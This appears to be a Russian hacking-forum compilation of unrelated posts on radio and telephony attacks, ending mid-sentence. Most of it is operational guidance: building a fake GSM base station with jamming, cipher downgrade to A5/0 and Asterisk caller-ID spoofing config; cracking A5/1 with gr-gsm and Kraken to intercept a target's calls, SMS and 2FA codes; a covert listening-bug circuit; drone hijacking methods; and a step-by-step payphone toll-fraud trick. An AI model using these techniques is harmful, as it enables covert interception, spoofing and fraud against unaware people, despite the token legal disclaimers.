В целом OpenBTS нормально заработал прямо из "китайской" виртуальной машины, на телефоне появилась тестовая сеть и при аттаче к ней пришла welcome SMS от iplinkme. А дальше меня ждало разочарование. Дело в том - OpenBTS весьма вяло поддерживается, в нем нет современных стандартов - и исторически сложилось так, что во всех своих проектах я использую довольно сильно модифицированные версии Osmocom - OsmoBTS/ osmobsc-openbsc . И тут возник облом. Да, софт с названием transceiver52M у Осмокома действительно есть. И вроде даже когда-то он работал с USRP1, для чего нужно ставить отдельные драйвера и собирать отдельную версию TRXа.
Я все это осуществил, но... китайский клон так и не заработал с Осмокомом. А может в самом осмокоме что-то поломали и совместимости со старыми usrp уже нет. К сожалению, за неимением оригинального usrp1 я не смог это проверить.
Решение было простым . BTS к BSC коннектится через A-bis же, все верно? И в осмокоме, и в опенбтс, и у "взрослых" операторов. Соответственно, пусть BTS и TRX остаются китайскими на openbts, а к ним через abis законнекчу осмокомовский BSC и все вокруг него (ggsn/sgsn, hlr и прочее). И это сработало!
Получается, что достаточно из виртуалки с openbts прокинуть бридж с портами BTS-TRX к виртуалке с осмокомом, прописать эти ip адреса и порты в конфиги осмокома - и не запускать осмокомовский TRX. И все работает.

Вот такой забавный девайс был совершенно случайно найден на ebay. Могу ли я его рекомендовать к приобретению? Для новичков - к сожалению, нет.
Потому как - с одной стороны вроде все работает, и даже вирт.машина готовая есть - а с другой стороны, для поддержки современных стандартов и телефонов, нужен некий секас с сопряжением ОпенБТС + Осмоком, что явно для тех кто уже знает толк...
Тем не менее, это довольно занятная плата, поддерживающая режим полного дуплекса. Ее можно использовать для расширения количества каналов в уже существующей инфраструктуре, или для каких-то более экзотических экспериментов с сотовой связью. Кстати, плата определяется в GnuRadio и вполне нормально работает.

Перехват трафика сотовой сети с помощью подменной Базовой Станции (FakeBTS), OpenBTS, YateBTS.

​

_«Радио уничтожило расстояние и соединило невидимой, но крепкой связью все корабли и все города земли.
Потом оно охватило поезда, автомобили и аэропланы… Потом оно вошло в дома.
Оно вошло учителем, другом, справочником, газетой и музыкальным инструментом.
Сейчас оно вносит в дома кинематограф, скоро сумеет вырваться за пределы земного шара, и создаст тысячи вещей, которых мы даже не можем предугадать.»_​

(с) С. А. Колбасьев

​

Введение
​

Пока писал первую статью вспомнил про сложности реализации данной атаки :smile80: и совершенно не полную картину происходящего и решил сразу же написать вторую часть. Так что за сложности? А дело в том, что в наших суровых реалиях, нужно будет находиться близко к цели и использовать Jammer (глушилку) что бы приглушить 2/3/4G и телефон упал в GSM сам для профита. Как минимум к оборудованию еще понадобятся яйца :smile83: или ~~группа лиц по предварительному сговору~~ несколько человек :smile43::smile43::smile43:.

У китайцев огромной популярностью пользуются подменные БС для рассылки SMS- спама, но как вы должны понимать, этим функции не ограничиваются.

Зато в свободной продаже всякие приколюшки связанные с GSM протоколом, по той простой причине, что вышки в Китае уже давно работают на 2G минимум.

… Так вот с БС все куда проще. Сотовая связь устроена так, что устройство будет подхватывать самый мощный сигнал вышки и, если приглушить на короткое время девайс, или вышку полностью (в реализации интереснее, не нужно быть очень близко), тогда абонент перейдет под ваш контроль с нужным вам шифрованием (A5/1) или вовсе без него (А5/0) :smile15:

Информации опять же очень много в свободном доступе, но приходится «додумывать» на ходу, кто-то найдет для себя что-то новое. Опишу самый короткий путь реализации данной атаки.

Немного повторюсь:

• MCC/MNC - код страны. Список всех MNC можно посмотреть здесь: http://mcclist.com/mobile-network-codes-country-codes.asp
  *Cell ID - Идентификатор базовой станции.
  *LAC ( Location Area Code) — код географической зоны, которая обслуживается одним контроллером базовых станцией (BSC). Когда происходит входящий вызов, то оповещение одновременно получают все базовые станции данной зоны.
  *ARFCN Absolute radio-frequency channel number — идентификатор, однозначно определяющий пару частот, используемых для приёма и передачи. Пример: за диапазоном 1800 закреплены номера 512 — 885. При этом частота передачи вычисляется по формуле 1710.2 + 0.2·(n−512), а частота приёма = частота передачи + 95.
• IMSI - международный идентификатор мобильного абонента (индивидуальный номер абонента), ассоциированный с каждым пользователем мобильной связи стандарта GSM, UMTS или CDMA. Во избежание перехвата, этот номер посылается через сеть настолько редко (только аутентификация пользователя), насколько это возможно — в тех случаях, когда это возможно, вместо него посылается случайно сгенерированный TMSI.
• TMSI - временный идентификатор мобильной станции GSM (мобильного телефона). TMSI назначается после успешной аутентификации и используется в процессе установки звонка, регистрации в сети и т. д. TMSI используется из соображений безопасности, для сокрытия других идентификаторов абонента, а именно, во избежание передачи IMSI через радиоэфир.

Все действия необходимо проводить только в своей сети со своими абонентами!

:smile6:Перехват чужих переговоров и СМС являются нарушением закона!:smile81: ​

Подбор железа
​

Тут все не так однозначно как по цене, так и по сути работы SDR.
Необходим Full-Duplex по той простой причине что трубка обменивается данными аутентификации и регистрируется в БС (получает TMSI , соотносит с номером абонента и т.д. т.п.).
Устройства типа HackRF - Half-Duplex не подойдут. Они работают только в режиме приема, либо передачи.

Сам Майкл Осман(создатель) о переделке HackRF в полный дуплекс:
«If you were to try to redesign the RF section on HackRF One to support full- duplex, the main thing to focus on would be the MAX2837 (intermediate frequency transceiver). This part is half-duplex, so you would either need two of them or you would have to redesign the RF section to use something other than the MAX2837, likely resulting in a radically different design. If you used two MAX2837s you might be able to use one RFFC5071 instead of two RFFC5072s.»

Кратко - все в устройстве кроме питания (необходим дополнительный блок), программной части и трансивера MAX2837 поддерживают такой апгрейд. В твиттере Османа есть схема full-duplex. Попробую обязательно напишу результат :smile17:

Самый простой и дешевый, очень популярный девайс - два телефона Motorola с123/с113/с118
В статье я упущу материал по установке и настройке сославшись на блог Pentestit на Хабре с полнейшим мануалом - https://habr.com/company/pentestit/blog/331406/

И покажу вам другу сторону данного телефона, это сканер-помощник поиска ARFCN :smile63:. Отличная вещь!

И уже полноценный SDR, приемлемый по цене и функционалу – BladeRF (~400$)

... замаскированнный под принтер :smile76:

По качеству исполнения есть устройство превосходящее -LimeSDR (~40-60 т.р) Есть версия Mini, а есть и полноценная - два канала на прием и два на передачу. Шикарно то что выходит вообще за область бытия и просиживания задницы на стуле… из Lime возможно сделать, доплеровский радар. Вам однозначно не будет скучно c SDR.

Полноценные по ширине канала от Fairwaves :
UmTRX Price: $950.00

Детище Ettus Research:
USRP B210 Price: $1216.00
USRP B200 Price: $745.00

Но у UmTRX есть преимущества:

• все схемы платы и исходные коды софта доступны под open source лицензией
• дешевле, чем аналогичная конфигурация на USRP
• плата может работать с двумя независимыми каналами, в то время как USRP имеют только один канал
• GPS для точной подстройки опорного генератора частоты уже встроен, а не закупается отдельно, как в USRP (плавающая частота генератора приводит в GSM к проблемам)

Или готовая БС - UmDesk Price: $3,000 (на базе того же UmTRX). Системный блок с платой UmTRX и предустановленной OpenBTS. Кароче найдите куда потратить деньги лучше :smile33:

Установка, конфигурация, запуск
​

Опишу общие принципы работы, все остальное поковырять самому и прочесть предлагающиеся мануалы ниже. Подробно пошаговые инструкции по установке. Самое главное на что нужно обратить внимание:

• Вы прописываете в конфигурационных файлах или напрямую в веб-интерфейсе такие параметры как - LAC / MCC / MNC предварительно «подглядев» их в открытых источниках.
• Понижаете «сiphering mode» до A5/0.
• Покупаете / подключаете IP телефонию с подменой CallerID и интеграцией с Asterisk (этих услуг более чем достаточно на просторах).
• Цепляете абонента. Он получает внутренний номер. Исходя из настроек Asterisk’a получает CallerID при звонке.

Что то в духе того:

Code:Copy to clipboard

/etc/asterisk/iax.conf

[VoicePulse]
type=peer
host=server.example.voicepulse.com
username=SomeuSer
secret=PaSsWorD

Code:Copy to clipboard

/etc/asterisk/sip.conf

[sipuser]
type=peer
host=dynamic
username=allan
secret=1234
context=outgoing

Code:Copy to clipboard

[outgoing]
exten => _1NXXNXXXXXX,1,SetCallerID(2024561111)
exten => _1NXXNXXXXXX,n,Dial(IAX2/VoicePulse/${EXTEN})

Что использовать:
YateBTS
https://wiki.yatebts.com/index.php/Installing - полноценный мануал по установке.
https://wiki.yatebts.com/index.php/Network_in_a_PC - настройка, веб- морда(!), asterisk, sip-транки.
и приятно выглядит.

OpenBTS – онли консоль.
https://github.com/RangeNetworks/dev/wiki
http://openbts.org/wiki/

OsmoBTS – тут все еще жестче, но стабильнее всего.
https://osmocom.org/projects/osmobts/wiki/Wiki

Заключение
​

Про сотовую связь на этом все :smile79:. Про SS7 упоминать не буду, так как лично не сталкивался. В следующий части мы опустимся на низкие частоты и поговорим про анализатор спектра, жучки и их поиск, рации спецслужб (псс и даже тех самых служб:smile47.

См. Радиохакинг ч.1 «GSM»

Данная статья ни призывает к противоправным действиям, а написана в целях обеспечения личной безопастности и указания на очевидные дыры в организации сотовых сетей.

L1 - 5-6 витков на оправке 4 мм. L2 - 4-5 витков внутри или поверх L1. Провод 0.5 мм. Рекомендую поэкспериментировать с соотношением витков и расположением катушек.

Транзистор КТ368 или КТ3102, микрофон от импортного телефона, магнитофона. Обычно схема работает сразу после включения. В любом случае рекомендую померить напряжение на базе транзистора высокоомным вольтметром, - оно должно быть порядка 1,1-1,2 В. Если же оно другое, то надо подобрать сопротивление R1 пока не будет все как надо.

Иногда возникающие проблемы обусловлены тем, что микрофоны изготовляемые разными фирмами отличаются сопротивлением ( 1.1 кОм примерно). Если большая выходная мощность не требуется, можно увеличить R2 до 200 Ом. В этом случае потр**ляемый ток составит около 7 mA , а это примерно 100-150 часов работы от батарейки "крона".

Можно применять и другие микрофоны например "Сосна" или МКЭ333, а также запитывать микропередатчик от 3- 5 В, но в этом случае придется изменять сопротивление R1 так, чтобы напряжение смещения на базе транзистора было порядка1.1-1.2 В.

Как только спаяете - скажите!

Не уверен что выбран правильный раздел, если что модератор перемести пожалуйста в более подходящую.

Интересуюсь такой темой как перехват/подавление каналов связи с воздушными дронами. Нуб в этой теме, вот все что на текущее время удалось понять. Все что сказано далее не есть 100% инфа, а просто компиляция мнений из сети. Буду рад поправкам и уточнениям.

Для перехвата дронов используется три с половиной основных способа: взлом канала WiFi с WEP-шифрованием (обычным aircrack-ng), подмена сигнала GPS, спуфинг протокола MavLink, подавление радиоканала помехами.

Первый способ подходит для дронов, в которых используется управление через Wifi. Не знаю является ли выбор WEP намеренным ослаблением защиты, или же причина в скорости шифрования на малых вычислительных ресурсах, но вот такой факт нашел. Методик взлома WEP полно в сети и тут их опускаю.

Способ с подменой GPS прост логически, но для этого используется сложная аппаратура. Продвинутые дроны используют информацию GPS для полета в большинстве режимов (вроде бы за исключением режима ATTI). В дроне заранее прошит список NFZ - No Fly Zones - бесполетных зон. Спуферы GPS имитируют координаты ближайшего аэропорта. Дрон видит, что он в аэропорту, это бесполетная зона и вот-вот он залетит в турбину боинга. Он немеделенно включает режим приземления.
Тут я сам не до конца понял, связаны ли угоны дронов в сторону Шереметьево и Пулково в Мск/Спб с этой атакой? Потому что одно дело приземление, а другое дело что он еще 10км летит до аэропорта, и при этом выходит из зоны подмены сигнала.

Способ с атакой на протокол MavLink основан на том, что протокол MavLink не шифрован. В нем есть механизм подписи пакетов, но в спецификации протокола (точнее в рекомендации к разработчикам реализации протокола) куча оговорок на режимы и случаи, в которых следует игнорировать кривую подпись. То есть чисто логически, протокол этот беззащитен, и конечно же есть реализации софта для перехвата таких дронов.

Способ с глушением всего и вся логически тоже понятен, просто херачим помехой на нужных частотах (2.4 и 5.8 Ггц).

Это как бы по верхам из того, что удалось нашарить поиском в интернете.
Теперь то, что хотелось бы узнать.

1. Обзор софта для управления дронами и их возможностей.
2. Какие протоколы используются для связи дрона с пультом по радиоканалу, и что у них с криптозащитой и ее стойкостью?
3. Какие атаки еще есть? Как именно происходит угон?
4. Есть ли соответствующий софт?
5. Есть ли анализ по фирменным прошивкам, ну к примеру Мавиков как наиболее популярных на сегодня дронов? что из себя представляет прошивка? есть ли там защита? накрыта ли она ключами?
6. Есть ли сторонние прошивки, или попытки их разработать?

Буду рад любым мнениям и советам. Это попытка разобраться для себя, ничего коммерческого не планируется.
Понимаю что тема для данного форума специфическая, ибо тут все таки больше применение к классическим компьютерам, сетям и их хакингу. Тем не менее, мы уже сейчас живем в интернете вещей, от видеокамер до автомобиля с кучей логов и телеметрии внутри. Возможно, администрации захотелось бы открыть соответствующий подраздел, поскольку это отдельная огромная вселенная, технически сложная и со своей спецификой.

понимаю там есть ЖПС передатчик (арендный)
принимаю любые рекомендации
очень интересна эта тематика от фуромчан
какие подводные?

Статья для участия в Конкурсе​

Перехват «GSM» трафика с помощью SDR, GNU-Radio, Wireshark, Kraken.

​

«В фантастических романах главное это было радио.
При нем ожидалось счастье человечества.
Вот радио есть, а счастья нет.»

(с) Илья Ильф, Евгений Петров

​

Введение

​

Попытаюсь сразу не согласиться с легендарными советскими писателями о том что «радио есть, а счастья нет». Радио в современном представлении дало нам такие замечательные вещи как – Wi-Fi, сигнализация, рация, GSM, 2/3/4/5G и кучу других G-овно устройств :smile55:, которые в реальном времени вещают на разных частотах и, конечно же, подвержены всевозможным уязвимостям, что не может не делать нас чуточку счастливее :smile94:.

В статье пойдет речь про всеми любимый протокол и «прародитель» сотовой связи – это, конечно, GSM.

Суть темы – уязвимость алгоритма шифрования A5/1 и её эксплуатация. Ходят слухи, что до сих пор используется практически всеми операторами сотовой связи даже в мегаполисах. У МТС изредка проскакивает A5/3. Сам я этого, конечно же, не проверял :smile25:, но доверюсь общедоступному мнению что так и есть, а значит все виды двухфакторной аутентификации(!), разговоры(!), трафик, - подвержены данной атаке.

Есть много информации в открытом доступе на данную тему, но когда начинаешь экспериментировать с нуля, возникает огромное количество вопросов и нестыковок. Еще бы - эти нестыковки начали появляться с самого 2009 года, когда Карстен Нол рассказал миру о проблеме. Стали появляться в сети испорченные билды программ, пропадать таблицы из общего доступа и вообще - «Ассоциация GSM описала планы Нола как незаконные и опровергла». Все дело в том, что для решения данного вопроса требуются нехилые вливания финансов, а операторы, особенно стран ближнего зарубежья и РФ «просвистели» все деньги вместо того что бы вливать их в инфраструктуру как оказалось, а тут еще Яровая со своими ЦОД-ами :smile35:

На написание данной статьи подтолкнул DefCon 21 , Balint Seeber , Karsten Nohl и банальное любопытство :smile92:. Не буду размусоливать долго о работе протоколов, информация направлена на «максимально быстрое включение из коробки».

Минимальные знания для прочтения и усвоения статьи:

• IMSI - международный идентификатор мобильного абонента (индивидуальный номер абонента), ассоциированный с каждым пользователем мобильной связи стандарта GSM, UMTS или CDMA. Во избежание перехвата, этот номер посылается через сеть настолько редко (только аутентификация пользователя), насколько это возможно — в тех случаях, когда это возможно, вместо него посылается случайно сгенерированный TMSI.
• TMSI - временный идентификатор мобильной станции GSM (мобильного телефона). TMSI назначается после успешной аутентификации и используется в процессе установки звонка, регистрации в сети и т. д. TMSI используется из соображений безопасности, для сокрытия других идентификаторов абонента, а именно, во избежание передачи IMSI через радиоэфир.
• MCC - мобильный код страны в комбинации с MNC является уникальным идентификатором сотового оператора сетей GSM, CDMA, iDEN, TETRA и UMTS, а также некоторых операторов спутниковой связи.
• Кс - сеансовый ключ шифрации, который нам и нужно получить.
  *ARFCN - В сетях GSM абсолютный номер канала.
  ***** A5/1 - поточный шифр, наиболее распространенный на сегодня.

Все действия необходимо проводить только в тестовой сети, о которой могу рассказать по желанию форумчан т.к. информации в клирнете более чем предостаточно, но материал будет слишком перенасыщен. Кроме того, подменная БС (базовая станция) является не менее интересным вектором атаки в данном направлении :smile86:.

:smile81:Перехват чужих переговоров и СМС являются нарушением закона!:smile6:

​

Шаг 1. Подбор железа

​

На что ловим.Software-defined radio _(SDR) _Программно-определяемое радио - это система радиосвязи, в которой компоненты, которые традиционно применяются в аппаратном обеспечении (например, микшеры, фильтры, усилители, модуляторы / демодуляторы, детекторы и т.д.), вместо этого реализуются с помощью программного обеспечения на персональном компьютере или встроенной системы. Хотя концепция SDR не нова, быстро развивающиеся возможности цифровой электроники делают практическими многие процессы, которые когда-то были возможны только теоретически.

Необходимым программным обеспечением будет - Gnu-Radio. Это очень крутой открытый проект, возможности в котором ограничиваются только вашими знаниями.

Необходимым железом для перехвата пакетов будет любой SDR-комплект. От самого простейшего RTL-SDR «свистка» (~1000 рублей) :

До лютейшего комплекса, который работает в режиме full-duplex - UmTRX Price: $950.00 (и который, кстати, подойдет для организации собственной тестовой сети :smile54:

​

Или готовая БС которой мне посчастливилось пользоваться UmDesk Price: $3,000 (на базе того же UmTRX):

«Таскать» такое с собой в кармане не получится, поэтому самым приемлемым портативным вариантом с более широкой полосой пропускания, чем у RTL-SDR будет HackRF One. Цена без кейса ~100$:

Есть вот такое интересное решение для апгрейда. PortaPack 220$:

Как видим, кейс с дисплеем и регулятором для HackRF. Отлично подойдет для поиска «жучков» и просто как анализатор спектра частот :smile49:. Честно… open-source, но ценник чересчур не демократичный при наличии прямых рук можно сделать дисплей, регулятор, звук отдельно. Частично перекрывается Android смартфоном и SDR-софтом.

• С полным списком SDR-устройств можно ознакомится на Википедии - https://en.wikipedia.org/wiki/List_of_software-defined_radios.

• Лучше взять сразу full-duplex, но и цена значительно разнится с простым приемником. Знакомство с SDR и Gnu-Radio однозначно только GSM не ограничится!

• Для корректного приема потребуется антенна, которая уверенно принимает на 900Mhz. Часто комплектной достаточно на небольшие дистанции.

• Обязательно потребуется наличие двух жестких дисков по 2TB каждый, - для расшифровки трафика программным комплексом Kraken.

• Не слабый компьютер. При установки одного из важных пакетов уйдет не мало ресурсов, как и при записи трафика широкой полосой.

Шаг 2. Установка и конфигурация​

• Ставим Linux Ubuntu 16.04. Только на ней с коробки все корректно «заколосилось» и не было никаких претензий к работе Gnu-Radio и SDR. Экспериментируйте
• Далее соблюдая очередность ставим необходимые пакеты:

Code:Copy to clipboard

sudo apt-get install git

git clone https://github.com/pybombs/pybombs.git

cd pybombs

sudo python setup.py install

sudo pybombs recipes add gr-recipes git+https://github.com/gnuradio/gr-recipes.git

//грузим так называемые «рецепты»
sudo pybombs recipes add gr-etcetera git+https://github.com/gnuradio/gr-etcetera.git

sudo pybombs prefix init /usr/local/ -a gr-gsm

// установка Gr-Gsm крайне долгая процедура ~4 часа. На i3 c 4Gb ОЗУ не установилось вообще. Работаю на i7.
sudo pybombs -p gr-gsm install gr-gsm

sudo ldconfig

• Самое страшное и долгое - радужные таблицы с помощью которых идет подбор Kс ключа. По данной ссылке нужно скачать ~1600Gb таблиц (40 файлов по 40) - https://opensource.srlabs.de/projects/a51-decrypt). Оооооочень медленно, начните с этого

Клонируем и компилим git:

Code:Copy to clipboard

git clone https://github.com/joswr1ght/kraken

//есть вариации подбора ключа из радужных таблиц с помощью видеокарты, что происходит немного быстрее, но я делал под процессор
make noati

• Далее нужно изменить файл конфигурации tables.conf в папке indexes (там должен быть файл с примером tables.conf.sample), в нем нужно указать на диск (именно на диск, а не раздел(!), так как Kraken будет переносить таблицы на чистую, без файловой системы).

• После этого нужно запустить скрипт из папки indexes:

Code:Copy to clipboard

python ./Behemoth.py /path/to/a51/tables/

и указать ему в качестве параметра папку, со скачанными заранее таблицами.

Шаг 3. Запуск и анализ​

Переходим в каталог с .grc файлами (GNU Radio Companion). Готовая блок схема для корректного получения трафика:

Code:Copy to clipboard

cd /usr/local/src/gr-gsm/apps
//и запускаем
sudo gnuradio-companion grgsm_livemon.grc

//далее запускаем Wireshark «натравленный» на GSM:
sudo wireshark -k -f udp -Y gsmtap -i lo

Тем самым мы можем видеть трафик в real-time.

Для работы в реальных сетях и потребуется любой калькулятор ARFCN, допустим - http://niviuk.free.fr/gsm_band.php

В общем доступе есть списки принадлежности к тому или иному оператору ARFCN которые нужно сопоставить с вашей целью для анализа непосредственно этой частоты.

Как узнать к какому ARFCN подключен абонент? Подумать :smile87: Это не сложно.

Для iPhone 3001#12345#

Для Android ##4636## или ##197328640##

Необходимо выяснить TMSI цели. Самый простой способ – отправка СМС.

Шаг 4. Получение Kc​

Данный пункт в текстовом варианте решил опустить по той причине, что есть информативное видео от Датских коллег. За исключением моментов:

• GR-GSM мы уже установили.
• Вы выяснили на каком канале сидит абон, далее записали эфир grgsm_capture.
• Для декодирования и анализа в Wireshark gsm_decode**.**

И далее работа с голосом:

Ознакомьтесь со всеми возможностями GR-GSM:
https://github.com/ptrkrysik/gr-gsm/wiki/Usage
https://github.com/ptrkrysik/gr-gsm/wiki/Usage:-Decoding-How-To

Обратите внимание на нижние строки "Decode hopping channels". Этот пункт понадобиться для работы с речью. Во время звонка происходят прыжки между каналами, для улучшения качества связи. Для борьбы с этим пунктом требуется grgsm_channelize.

Настоятельно рекомендую к просмотру канал Датчан!

Заключение​

Это только маленькая вершинка айсберга во всем потоке радиоволн. Есть еще дырявые автосигнализации, обычные сигнализации которые вещают в радио и gsm канале, всевозможные рации служб которые в открытом доступе транслируют персональные данные, наплевав на ФЗ о Защите персональных данных, спутники, RFID, пассивная сборка данных с Wi-Fi и многое другое что вы сможете изучить погрузившись в изучение SDR . Спасибо за внимание :smile60:

Данная статья ни призывает к противоправным действиям, а написана в целях обеспечения личной безопастности и указания на очевидные дыры в организации сотовых сетей.

Главное стабильно работающий - использую MeMu, не устраивает как работает, очень не надежное решение.
Ищу нечто подобное, самопальные решения конечно в приоритете - но сильно сомневаюсь, личка открыта, ищу диалога по сабжу, спасибо.

Схема представляет собой усилитель с положительной обратной связью. Устанавливается на т/ф линию параллельно модему. Усиление 1,5..2 раза. Операционный усилитель DA1 можно использовать любой, учитывая назначение выводов. Использовался 553УД2 в пластмассовом DIP. 3 +Vcc=9...15V, -Vcc=-9...-15V. Т.е. нужен двуполярный источник со средней "землей" (gnd). L1

• любой дроссель на 200..400uH. Использовался ДП1,2-400. R1 - регулирует усиление. VS1, VS2 - симметричные стабилитроны на 20V для защиты DA1. Применялись 2 последовательно соединенных КС210Б. Конденсатор С3 включен правильно: (+) на gnd.

Настройка.

Если имеется осциллограф, при включенном питании и подключенной т/ф линии (трубка поднята!) проверяется наличие генерации на выводе 10 DA1 при крайнем левом по схеме положении движка R1.

Постеренно увеличивая R1 добиться пропадания генерации. Это положение R1 соответствует некоторому пороговому уровню усиления. Для устойчивости добавить 5..20 % к текущему значению R1.

Все эти операции можно проделать без осциллографа на слух, подключив параллельный аппарат, но нужно будет учитывать дополнительную нагрузку в линии. Окончательное положение R2 - при конкретном коннекте.

Схему чуть позже дам.

Hачем с того, как таксофоны определяют стоимость звонка.
1. Если номер, набранный абонентом, начинается на 1,2,3,4,5,9, то таксофон полагает, что это внутригородской звонок, и тарифицирует его по минимальному тарифу (в Питере - 1-я минута - 2 бита, остальное время - 1 бит в минуту). Счетчик включается в двух случаях:
- после проключения разговорного состояния, которое наступает приблизительно через 600-800 ms после снятия трубки вызываемым абонентом.
- при нажатии на клавишу * (это необходимо только на ограниченном числе станций, на которых не происходит переполюсовка при проключении разговорного состояния, из-за чего таксофон не определяет начало разговора; иногда это происходит и на других станциях; на обычнах таксофонах в таких случаях не проваливаются жетоны)
Hа время разговора карточка блокируется в таксофоне, а если ее оттуда вытащить, то соединение немедленно разрушается.
2. Если номер, набранный абонентом, начинается на 0, то таксофон полагает, что это звонок на бесплатную службу. Такой звонок не тарифицируется и карточка не блокируется в таксофоне, так что ее даже можно вынуть из него (или не вставлять ее вообще). При этом через некоторое время после начала набора номера, независимо от количества набранных цифр, Питерские таксофоны гасят индикатор, продолжая при этом набирать все введенные ранее цифры и все, что будет набрано позже. Цифры, набранные после очистки индикатора, остаются на нем до конца разговора.
3. Если абонент набрал 8, то таксофон ждет ввода следующих нескольких цифр, позволяющих ему определить тарифную зону вызываемого абонента, запоминая набираемые цифры в своей памяти (при вызове в другой город это 3 цифры кода, а при международном вызове 10 и код страны). После определения тарифной зоны таксофон либо выдает сообщение об ошибке (при недостатке единиц на карточке) либо начинает набирать введенные цифры и все, что набирается после этого. Hабор всех цифр после 8 происходит только после получения сигнала готовности от междугородней АТС (зуммер 425 Гц).
Во всех случаях набор первой цифры номера происходит только после получения таксофном сигнала готовности от городской АТС. Если после набора первой цифры зуммер не исчезает, то таксофон фиксирует ошибку и прекращает набор номера.
Теперь подумаем о том, как возможно использовать таксофон в нестандартных режимах, позволяющих значительно сократить стоимость телефонного разговора.
Весьма остроумной и подкупающей своей новизной идеей является мысль о инициалицации встроенной системы тарификации ПОСЛЕ набора 8. При этом таксофон начинает анализировать первые цифры кода города или 10 (при международном вызове) как первые цифры городского номера. Для этого предназначена специальная клавиша, позволяющая сбросить набранную на индикаторе информацию. В настоящее время мы располагаем только точной информацией о наличии этой клавиши на питерских карточных таксофонах. При наличии некоторого опыта пользования данными таксофонами, найти ее сможет даже слепой - на ощупь. Она находится немного левее индикатора, на котором отображается информация. Желательно не путать ее с клавишами, расположенными ниже индикатора, и предназначенными для ввода информации. Она отличается цветом (черная), формой (рогатая) и размером (выпирающая). В отличии от остальных клавиш нажатия на нее производятся не перпендикулярно поверхности таксофона, а вдоль нее (сверху-вниз). Она настолько выпирает из таксофона, что обычно на ней висит трубка.
Вы легко можете убедиться в свойствах этой клавиши. Hаберите 8. После этого Вы услышите гудок. Потом повесьте трубку на место. Обратите внимание на то, что набранная Вами информация исчезла (если Вы до сих пор не догадались, совершенно не обязательно вешать трубку, достаточно просто нажать и отпустить магическую клавишу). После этого начинайте набор кода города или 10. Теперь Вы располагаете полной информацией, необходимой для минимизации стоимости междугородных разговоров.
К сожалению, при использовании этого трюка в большинстве случаев соединение с АМТС пропадает (так как это является основной функцией этой клавиши). К еще большему сожалению, при проектировании таксофонов их авторы предусмотрели, что даже при очень коротком нажатии на рычаг линия разрывается на некоторое время, достаточно для надежного разрыва соединения. Hо это не должно Вас останавливать.
Как Вы, несомненно, знаете, в момент срабатывания аппаратуры АОH (наступает после набора цифры 8), и выдачи номера абонента (таксофона) по запросу АМТС, линия абонента на большинстве городских АТС (АТСК и другие) шунтируется на время равное времени выдачи двух безинтервальных пакетов частотных кодом "2 из 6", содержащих номер и категорию вызывающего абонента (в Питере большинство карточных таксофонов имеют категорию 7). Время выдачи, а следовательно и шунтирования таксофонной линии, колеблется от 360 до 720 ms. В момент шунтирования станция не реагирует на любые действия с абонентской линией, в том числе и на разрыв линии. Это сделано для того, чтобы абонент не мог помешать выдаче своего телефонного номера на АМТС. Следовательно в течении выдачи пакета АОH разрыв соединения с АТС невозможен (в течении 360-720 ms).
При кратковременном нажатии на магическую клавишу в момент начала выдачи ответа аппаратурой АОH после набора 8 (начало выдачи определяется по характерному щелчку), таксофон производит разъединение с городской станцией на время около 400 ms и инициализирует систему тарификации. Однако, по вышеуказанным причинам, городская АТС не теряет соединение абонента (таксофона) с АМТС. Выдержав паузу около 400 ms после кратковременного нажатия, таксофон опять подключается к городской линии, но слышит сигнал готовности не городской АТС, а междугородней, т.к. время разъединения линии таксофоном (400 ms) в большинстве случаев оказывается меньше времени шунтирования линии на ГАТС. После этого Вы можете начинать набор кода города (или 10 для выхода на международную связь), что будет воспринято таксофоном как набор городского номера (и оплата ведется по городскому тарифу, разговор с Америкой удешевляется в 107 раз).
Существуют некоторые ньюансы при использовании этого метода:
1. К сожалению, города, коды которых начинаются на 8, таким образом не набираются.
2. Разговор с городами, коды которых начинаются на 0, не тарифицируются вообще. Вы можете вытащить карточку сразу после получения зуммера от АМТС после набора цифры 8. Карточку лучше положить в карман, чтобы не забыть ее в таксофоне после длительного разговора.
3. Hа таксофонах, подключенных к электронным станциям, этот метод не работает вообще. Вы легко обнаружите эту ситуацию, т.к. обычно на таких таксофонах включен тональный набор.
4. Hа ограниченном количестве городских координатных АТС возможен разрыв соединения даже в момент выдачи пакета АОH (например питерские АТС 272, 273, 481). Hа таких АТС метод не работает.
5. В последнее время все чаще и чаще встречаются таксофоны с увеличенным временем разрыва линии и с ограничением длинны городского номера семью цифрами. Однако, несмотря на это нововведение, с некоторых из них сохраняется возможность выхода на города, коды которых начинаются на 0. Ограничение количества цифр номера почему-то по прежнему нет.
Для применения этого метода Вам необходима хорошая реакция, хороший слух и наличие чуства юмора. Для более легкого освоения этого метода мы рекомендуем Вам выбрать таксофоны, установленные на АТС, зуммер которых отличается от зуммера АМТС. При этом, после нажатия на магическую клавишу, Вы легко сможете отличить зуммер АМТС (появляется после правильного нажатия) от зуммера ГАТС (при ошибке с Вашей стороны), желающим набить руку, рекомендуем потренироваться дома (алгоритм тот же), но не думайте, что в этом случае разговор станет дешевле.
Любителям очень длительных телефонных разговоров, рекомендуем задуматься над следующим: после снятия трубки вызываемым абонентом, линия шунтируется также, как и при ответе аппаратуры АОH (но информация о номере не выдается, конечно, если только в Америке не поставят АОH с десятью запросами). Если Вам хватит фантазии для того, чтобы расширить описанный нами алгоритм, то Вы сможете звонить куда угодно совсем бесплатно, в том числе и в города, коды которых начинаются на 8.
Все вышеописанное используется уже в течении полутора лет, с момента появления первых карточных таксофонов на улицах нашего города.
P.S. После написания этой статьи я получил огромное число писем с просьбой объяснить, о какой именно "магической клавише" идет речь. Для тормозов: это рычаг, на который вешается трубка таксофона, при помощи которого разрывается соедиенние

Краткий обзор, скорее для обращения взора общественности на крайне интересный инструмент :smile37: Продукт получился очень годным, хотя на бету ругаются благим матом из за привычных проблем с драйверами.

Ура ламерки, пришел ГУЕвый продукт для самых маленьких в котором можно работать из коробки с SDR и ВиФи, что конечно очень радует.

SigintOS - это дистрибутив на основе Ubuntu с несколькими встроенными приложениями для анализа сигналов для программно-определяемых радиостанций, таких как RTL-SDR и другие поддерживающие TX SDR, такие как HackRF, bladeRF и USRP.

Дистрибутив выглядит очень хорошо выполненным, со встроенным графическим интерфейсом, который предоставляет легкий доступ к некоторым распространенным инструментам Sigint, таким как передатчик FM и GPS, глушилка, инструмент поиска базовой станции GSM и IMSI-кэтчер. SigintOS также имеет различные другие предустановленные программы, такие как GNU Radio, gr-gsm, YatesBTS, wireshark и GQRX.

ОС также предлагает поиск LTE и декодер LTE, для доступа к которым требуется, чтобы вы связались с создателями, предположительно за плату за лицензирование. Что касается улавливателя LTE IMSI, они пишут:

